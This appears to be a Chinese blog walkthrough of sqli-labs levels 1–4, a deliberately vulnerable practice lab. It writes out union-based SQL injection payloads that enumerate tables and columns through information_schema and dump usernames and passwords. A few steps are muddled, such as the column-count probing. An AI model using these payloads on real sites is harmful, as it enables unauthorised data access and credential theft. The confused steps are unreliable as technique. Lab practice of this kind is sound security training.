博客
关于我
sqli-lab闯关1—4
阅读量:690 次
发布时间:2019-03-17

本文共 1256 字,大约阅读时间需要 4 分钟。

《数据库注入实战》

第一关:单引号注入

第一步:判断闭合符号

输入单引号 ',检查报错信息。报错表明输入内容被放入一对单引号中。记住,这里报错是为了确认注入类型。

第二步:判断列数

输入 ?id=1' order by 1 -- 发现报错,尝试改为 ?id=2, ?id=3 等,直到报错为止。例如,到 ?id=4 报错,说明可用列数为4。

第三步:联合注入爆数据库名

尝试 ?id=0' union select 1,2,database() --,发现可以提取数据库名称。

第四步:爆数据表

使用 ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --Get all tables in the database.

第五步:爆字段

利用 ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --Get all columns of the users table.

第六步:爆值

尝试 ?id=0' union select 1,2,group_concat(username,0x3a,password) from users --,这样可以获取用户名和密码。注意,0x3a 表示冒号 :

第二关:数字型注入

第一步:判断闭合符号

输入 ?id=1',发现无需单引号即可完成注入。

第二步:判断列数

与第一关类似,使用 ?id=1 order by 1, ?id=2 等,直到报错确定可用列数。

优化提示:

此关的目标是直接注入数字值,可以省略 SQL 注入的常数处理步骤。

第三关:圆括号注入(模糊点)

第一步:判断闭合符号

输入单引号 发现报错,但随后尝试圆括号 (), 无报错表明此关的注入类型为圆括号。

第二步:判断列数

使用 ?id=1... 一步步测试,发现可用列数为4。

第四关:双引号注入

第一步:判断闭合符号

尝试双引号 ",报错表明注入类型为双引号。

第二步:判断列数

输入 ?id=1" order by 1 等,确定可用列数为4。

第三步:联合注入爆数据库名

尝试 ?id=0" union select 1,2,database() -- 获取数据库名称。

第四步:爆数据表

使用 ?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() 获取所有表名。

总结

通过一步步尝试不同的注入类型和闭合符号,可以有效利用数据库注入技术获取所需信息。每关结尾记得清理SQL会话以避免干扰。

转载地址:http://ppshz.baihongyu.com/

你可能感兴趣的文章
php后台的在控制器中就可以实现阅读数增加
查看>>
php命令行生成项目结构
查看>>
php商店管理系统,基于PHP的商店管理系统.doc
查看>>
php在liunx系统中设置777权限不起作用解决方法
查看>>
PHP基于openssl实现的非对称加密操作
查看>>
php如何定义的数位置,php如何实现不借助IDE快速定位行数或者方法定义的文件和位置...
查看>>
RabbitMQ集群 - 仲裁队列、Raft协议(最详细的选举流程)
查看>>
PHP学习总结(11)——PHP入门篇之WAMPServer多站点配置
查看>>
PHP学习总结(12)——PHP入门篇之变量
查看>>
PHP学习总结(13)——PHP入门篇之常量
查看>>
PHP学习总结(14)——PHP入门篇之常用运算符
查看>>
PHP学习总结(1)——PHP入门篇之PHP可以做什么?
查看>>
PHP学习总结(4)——PHP入门篇之PHP计算表达式
查看>>
PHP学习总结(7)——PHP入门篇之PHP注释
查看>>
PHP学习总结(9)——PHP入门篇之WAMPServer服务控制面板介绍
查看>>
PHP学习笔记一:谁动了你的mail(),PHP?
查看>>
PHP安全实战
查看>>
php安装扩展
查看>>
php实现单链表
查看>>
php实现多个一维数组对应合并成二维数组
查看>>